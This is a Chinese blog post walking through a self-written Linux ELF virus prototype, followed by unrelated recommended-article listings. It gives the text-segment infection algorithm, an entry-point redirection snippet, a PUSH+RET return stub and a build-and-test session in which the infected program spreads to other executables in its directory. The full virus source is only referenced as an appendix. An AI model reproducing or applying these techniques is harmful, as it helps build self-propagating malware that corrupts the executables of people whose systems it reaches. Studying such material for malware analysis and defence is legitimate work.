剖析Linux病毒原型工作过程和关键环节

作者：韩志勇1234 | 来源：互联网 | 2017-11-08 01:11

文章标题：剖析Linux病毒原型工作过程和关键环节。Linux是中国IT实验室的一个技术频道。包含桌面应用，Linux系统管理，内核研究，嵌入式系统和开源等一些基本分类

　　一、介绍
　　
　　写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结，同时向对这方面有兴趣的朋友做一个简单的介绍。阅读这篇文章你需要一些知识，要对ELF有所了解、能够阅读一些嵌入了汇编的C代码、了解病毒的基本工作原理。
　　
　　二、 ELF Infector (ELF文件感染器)
　　
　　为了制作病毒文件，我们需要一个ELF文件感染器，用于制造第一个带毒文件。对于ELF文件感染技术，在Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》一文中已经有了一个非常好的分析、描述，在这方面我还没有发现可以对其进行补充的地方，因此在这里我把Silvio Cesare对ELF Infection过程的总结贴出来，以供参考：
　　
　　The final algorithm is using this information is.
　　* Increase p_shoff by PAGE_SIZE in the ELF header
　　* Patch the insertion code (parasite) to jump to the entry point
　　(original)
　　* Locate the text segment program header
　　* Modify the entry point of the ELF header to point to the new
　　code (p_vaddr + p_filesz)
　　* Increase p_filesz by account for the new code (parasite)
　　* Increase p_memsz to account for the new code (parasite)
　　* For each phdr who's segment is after the insertion (text segment)
　　* increase p_offset by PAGE_SIZE
　　* For the last shdr in the text segment
　　* increase sh_len by the parasite length
　　* For each shdr who's section resides after the insertion
　　* Increase sh_offset by PAGE_SIZE
　　* Physically insert the new code (parasite) and pad to PAGE_SIZE, into
　　the file - text segment p_offset + p_filesz (original)
　　
　　在Linux病毒原型中所使用的gei - ELF Infector即是根据这个原理写的。在附录中你可以看到这个感染工具的源代码: g-elf-infector.cg-elf-infector与病毒是独立开的，其只在制作第一个病毒文件时被使用。我简单介绍一下它的使用方法，g-elf-infector.c可以被用于任何希望--将二进制代码插入到指定文件的文本段，并在目标文件执行时首先被执行--的用途上。g-elf-infector.c的接口很简单，你只需要提供以下三个定义：
　　
　　* 存放你的二进制代码返回地址的地址，这里需要的是这个地址与代码起始地址的偏移，用于返回到目标程序的正常入口
　　
　　#define PARACODE_RETADDR_ADDR_OFFSET 1232
　　
　　* 要插入的二进制代码（由于用C编写，所以这里需要以一个函数的方式提供）
　　void parasite_code(void);
　　
　　* 二进制代码的结束（为了易用，这里用一个结尾函数来进行代码长度计算）
　　void parasite_code_end(void);
　　
　　parasite_code_end应该是parasite_code函数后的第一个函数定义，通常应该如下表示
　　void parasite_code(void)
　　{
　　...
　　...
　　...
　　}
　　void parasite_code_end(void) {}
　　
　　在这里存在一个问题，就是编译有可能在编译时将parasite_code_end放在parasite_code地址的前面，这样会导致计算代码长度时失败，为了避免这个问题，你可以这样做
　　void parasite_code(void)
　　{
　　...
　　...
　　...
　　}
　　void parasite_code_end(void) {parasite_code();}
　　
　　有了这三个定义，g-elf-infector就能正确编译，编译后即可用来ELF文件感染
　　
　　face=Verdana>
　　
　　三、病毒原型的工作过程
　　
　　1 首先通过ELF Infector将病毒代码感染到一个ELF文件，这样就创造了第一个带毒文件，后续的传播就由它来完成。
　　
　　2 当带毒文件被执行时，会首先跳到病毒代码开始执行。
　　
　　3 病毒代码开始发作，在这个原型里，病毒会直接开始传播。
　　
　　4 病毒遍历当前目录下的每一个文件，如果是符合条件的ELF文件就开始感染。
　　
　　5 病毒的感染过程和ELF Infector的过程类似，但由于工作环境的不同，代码的实现也是有较大区别的。
　　
　　6 目前传染对ELF文件的基本要求是文本段要有剩余空间能够容纳病毒代码，如果无法满足，病毒会忽略此ELF。对于被感染过一次的ELF文件，文本段将不会有剩余的空间，因此二次感染是不会发生的。
　　
　　7 病毒代码执行过后，会恢复堆栈和所有寄存器（这很重要），然后跳回到真正的可执行文件入口，开始正常的运行过程。
　　
　　上面对病毒原型的工作过程的介绍也许显得千篇一律了，和我们早就熟知的关于病毒的一些介绍没有什么区别？是的，的确是这样，原理都是类似的，关键是要看实现。下面我们就将通过对一些技术问题的分析来了解具体的实现思路。
　　
　　四、关键技术问题及处理
　　
　　1 ELF文件执行流程重定向和代码插入
　　
　　在ELF文件感染的问题上，ELF Infector与病毒传播时调用的infect_virus思路是一样的：
　　
　　* 定位到文本段，将病毒的代码接到文本段的尾部。这个过程的关键是要熟悉ELF文件的格式，将病毒代码复制到文本段尾部后，能够根据需要调整文本段长度改变所影响到的后续段(segment)或节(section)的虚拟地址。同时注意把新引入的文本段部分与一个.setion建立关联，防止strip这样的工具将插入的代码去除。还有一点就是要注意文本段增加长度的对齐问题，见ELF文档中的描述：
　　p_align
　　As ``Program Loading'' later in this part describes, loadable
　　process segments must have congruent values for p_vaddr and
　　p_offset, modulo the page size.
　　
　　* 通过过将ELF文件头中的入口地址修改为病毒代码地址来完成代码重定向：
　　/* Modify the entry point of the ELF */
　　org_entry = ehdr->e_entry;
　　ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
　　
　　2 病毒代码如何返回到真正的ELF文件入口
　　
　　方法技巧应该很多，这里采用的方法是PUSH+RET组合：
　　
　　__asm__ volatile (
　　...
　　"return:\n\t"
　　"push $0xAABBCCDD\n\t" /* push ret_addr */
　　"ret\n"
　　::);
　　
　　其中0xAABBCCDD处存放的是真正的程序入口地址，这个值在插入病毒代码时由感染程序来填写。
　　
　　五、新编译环境下的调试方法
　　
　　grip2@linux:~/tmp/virus> ls
　　g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c Makefile parasite-sample.c parasite-sample.h
　　
　　调整Makefile文件，将编译模式改为调试模式，即关掉-DNDEBUG选项
　　grip2@linux:~/tmp/virus> cat Makefile
　　all: foo gei
　　gei: g-elf-infector.c gvirus.o
　　gcc -O2 $　　foo: foo.c
　　gcc $<-o foo
　　gvirus.o: gvirus.c
　　gcc $<-O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
　　clean:
　　rm *.o -rf
　　rm foo -rf
　　rm gei -rf
　　
　　编译代码
　　grip2@linux:~/tmp/virus> make
　　gcc foo.c -o foo
　　gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
　　gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
　　
　　先获取病毒代码长度，然后调整gvirus.c中的#define PARACODE_LENGTH定义
　　grip2@linux:~/tmp/virus>. /gei -l <.这里获取病毒代码的长度
　　Parasite code length: 1744
　　
　　获取病毒代码开始位置和0xaabbccdd的地址，计算存放返回地址的地址的偏移
　　grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd
　　8049427: 68 dd cc bb aa push $0xaabbccdd
　　grip2@linux:~/tmp/virus> objdump -d gei|grep ""
　　08048d80 :
　　8049450: e9 2b f9 ff ff jmp 8048d80
　　grip2@linux:~/tmp/virus> objdump -d gei|grep ":"
　　08048d80 :
　　
　　0x8049427与0x8048d80相减即获得我们需要的偏移，用这个值更新gvirus.h中的#define PARACODE_RETADDR_ADDR_OFFSET宏的值
　　
　　重新编译
　　grip2@linux:~/tmp/virus> make clean
　　rm *.o -rf
　　rm foo -rf
　　rm gei -rf
　　grip2@linux:~/tmp/virus> make
　　gcc foo.c -o foo
　　gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
　　gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
　　
　　grip2@linux:~/tmp/virus> ls
　　gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c
　　g-elf-infector.c gunistd.h gvirus.h foo Makefile parasite-sample.h
　　
　　建立一个测试目录，测试一下
　　grip2@linux:~/tmp/virus> mkdir test
　　grip2@linux:~/tmp/virus> cp gei foo test
　　grip2@linux:~/tmp/virus> cd test
　　grip2@linux:~/tmp/virus/test> ls
　　gei foo
　　grip2@linux:~/tmp/virus/test> cp foo h
　　
　　制作带毒程序
　　grip2@linux:~/tmp/virus/test>. /gei h
　　file size: 8668
　　e_phoff: 00000034
　　e_shoff: 00001134
　　e_phentsize: 00000020
　　e_phnum: 00000008
　　e_shentsize: 00000028
　　e_shnum: 00000025
　　text segment file offset: 0
　　[15 sections patched]
　　grip2@linux:~/tmp/virus/test> ll
　　total 44
　　-rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei
　　-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
　　-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo
　　
　　运行带毒程序
　　grip2@linux:~/tmp/virus/test>. /h
　　.
　　..
　　gei
　　foo
　　h
　　.backup.h
　　real elf point
　　grip2@linux:~/tmp/virus/test> ll
　　total 52
　　-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
　　-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
　　-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
　　
　　测试上面带毒程序运行后，是否感染了其他ELF程序
　　grip2@linux:~/tmp/virus/test>. /foo
　　.
　　..
　　gei
　　Better luck next file
　　foo
　　h
　　Better luck next file
　　.backup.h
　　Better luck next file
　　real elf point
　　
　　OK，成功
　　grip2@linux:~/tmp/virus/test> cp. ./foo hh
　　grip2@linux:~/tmp/virus/test> ll
　　total 64
　　-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
　　-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
　　-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh
　　-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
　　
　　grip2@linux:~/tmp/virus/test>. /foo
　　.
　　..
　　gei
　　Better luck next file
　　foo
　　h
　　Better luck next file
　　.backup.h
　　Better luck next file
　　hh
　　real elf point
　　grip2@linux:~/tmp/virus/test>
　　
　　六、总结
　　
　　由于我既不是一个virus coder也不是一个anti-viruscoder，所以对病毒技术的掌握应该是有欠缺的。如果在文章中对病毒技术的描述不够准确，分析不够到位，还请指正，谢谢。

linux
go

推荐阅读

int
解决Docker中volume的权限问题的方法

在Docker中，将主机目录挂载到容器中作为volume使用时，常常会遇到文件权限问题。这是因为容器内外的UID不同所导致的。本文介绍了解决这个问题的方法，包括使用gosu和suexec工具以及在Dockerfile中配置volume的权限。通过这些方法，可以避免在使用Docker时出现无写权限的情况。 ... [详细]

蜡笔小新 2023-12-14 18:48:02
go
学习SLAM的女生，很酷

本文介绍了学习SLAM的女生的故事，她们选择SLAM作为研究方向，面临各种学习挑战，但坚持不懈，最终获得成功。文章鼓励未来想走科研道路的女生勇敢追求自己的梦想，同时提到了一位正在英国攻读硕士学位的女生与SLAM结缘的经历。 ... [详细]

蜡笔小新 2023-12-14 17:55:18
int
数据库的存储结构及其重要性

本文介绍了数据库的存储结构及其重要性，强调了关系数据库范例中将逻辑存储与物理存储分开的必要性。通过逻辑结构和物理结构的分离，可以实现对物理存储的重新组织和数据库的迁移，而应用程序不会察觉到任何更改。文章还展示了Oracle数据库的逻辑结构和物理结构，并介绍了表空间的概念和作用。 ... [详细]

蜡笔小新 2023-12-14 16:00:02
perl
Nginx使用AWStats日志分析的步骤及注意事项

本文介绍了在Centos7操作系统上使用Nginx和AWStats进行日志分析的步骤和注意事项。通过AWStats可以统计网站的访问量、IP地址、操作系统、浏览器等信息，并提供精确到每月、每日、每小时的数据。在部署AWStats之前需要确认服务器上已经安装了Perl环境，并进行DNS解析。 ... [详细]

蜡笔小新 2023-12-14 19:42:01
int
云原生边缘计算之KubeEdge简介及功能特点

本文介绍了云原生边缘计算中的KubeEdge系统，该系统是一个开源系统，用于将容器化应用程序编排功能扩展到Edge的主机。它基于Kubernetes构建，并为网络应用程序提供基础架构支持。同时，KubeEdge具有离线模式、基于Kubernetes的节点、群集、应用程序和设备管理、资源优化等特点。此外，KubeEdge还支持跨平台工作，在私有、公共和混合云中都可以运行。同时，KubeEdge还提供数据管理和数据分析管道引擎的支持。最后，本文还介绍了KubeEdge系统生成证书的方法。 ... [详细]

蜡笔小新 2023-12-14 16:49:01
require
伊振华作品 | 沈阳市智慧城市运行管理中心的设计与建设

本文介绍了设计师伊振华受邀参与沈阳市智慧城市运行管理中心项目的整体设计，并以数字赋能和创新驱动高质量发展的理念，建设了集成、智慧、高效的一体化城市综合管理平台，促进了城市的数字化转型。该中心被称为当代城市的智能心脏，为沈阳市的智慧城市建设做出了重要贡献。 ... [详细]

蜡笔小新 2023-12-14 16:35:39
settings
单击后为什么远程通知操作无效？ - Why remote notification action is doing nothing after clicking?

IhaveconfiguredanactionforaremotenotificationwhenitarrivestomyiOsapp.Iwanttwodiff ... [详细]

蜡笔小新 2023-12-14 15:57:44
ip
Python字典推导式及循环列表生成字典方法

本文介绍了Python中使用字典推导式和循环列表生成字典的方法，包括通过循环列表生成相应的字典，并给出了执行结果。详细讲解了代码实现过程。 ... [详细]

蜡笔小新 2023-12-14 14:54:09
int
在Windows 8上安装gvim中的插件的错误加载问题

本文讨论了在Windows 8上安装gvim中插件时出现的错误加载问题。作者将EasyMotion插件放在了正确的位置，但加载时却出现了错误。作者提供了下载链接和之前放置插件的位置，并列出了出现的错误信息。 ... [详细]

蜡笔小新 2023-12-14 14:44:00
int
CSS3选择器的使用方法详解，提高Web开发效率和精准度

本文详细介绍了CSS3新增的选择器方法，包括属性选择器的使用。通过CSS3选择器，可以提高Web开发的效率和精准度，使得查找元素更加方便和快捷。同时，本文还对属性选择器的各种用法进行了详细解释，并给出了相应的代码示例。通过学习本文，读者可以更好地掌握CSS3选择器的使用方法，提升自己的Web开发能力。 ... [详细]

蜡笔小新 2023-12-14 14:37:52
go
2020年AI产业报告：100个岗位抢1个人，计算机视觉成最大缺口

“你永远都不知道明天和‘公司的意外’哪个先来。”疫情期间，这是我们最战战兢兢的心情。但是显然，有些人体会不了。这份行业数据，让笔者“柠檬” ... [详细]

蜡笔小新 2023-12-14 12:23:22
main
Open judge C16H: Magical Balls 快速幂+逆元问题解析

本文主要解析了Open judge C16H问题中涉及到的Magical Balls的快速幂和逆元算法，并给出了问题的解析和解决方法。详细介绍了问题的背景和规则，并给出了相应的算法解析和实现步骤。通过本文的解析，读者可以更好地理解和解决Open judge C16H问题中的Magical Balls部分。 ... [详细]

蜡笔小新 2023-12-14 12:03:27
main
差分约束系统求解House Man跳跃问题的思路与方法

本文讨论了使用差分约束系统求解House Man跳跃问题的思路与方法。给定一组不同高度，要求从最低点跳跃到最高点，每次跳跃的距离不超过D，并且不能改变给定的顺序。通过建立差分约束系统，将问题转化为图的建立和查询距离的问题。文章详细介绍了建立约束条件的方法，并使用SPFA算法判环并输出结果。同时还讨论了建边方向和跳跃顺序的关系。 ... [详细]

蜡笔小新 2023-12-14 11:49:51
ip
生成对抗式网络GAN及其衍生CGAN、DCGAN、WGAN、LSGAN、BEGAN介绍

一、GAN原理介绍学习GAN的第一篇论文当然由是IanGoodfellow于2014年发表的GenerativeAdversarialNetworks（论文下载链接arxiv：[h ... [详细]

蜡笔小新 2023-12-14 11:39:45
usb
[译]技术公司十年经验的职场生涯回顾

本文是一位在技术公司工作十年的职场人士对自己职业生涯的总结回顾。她的职业规划与众不同，令人深思又有趣。其中涉及到的内容有机器学习、创新创业以及引用了女性主义者在TED演讲中的部分讲义。文章表达了对职业生涯的愿望和希望，认为人类有能力不断改善自己。 ... [详细]

蜡笔小新 2023-12-14 11:31:05

韩志勇1234

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章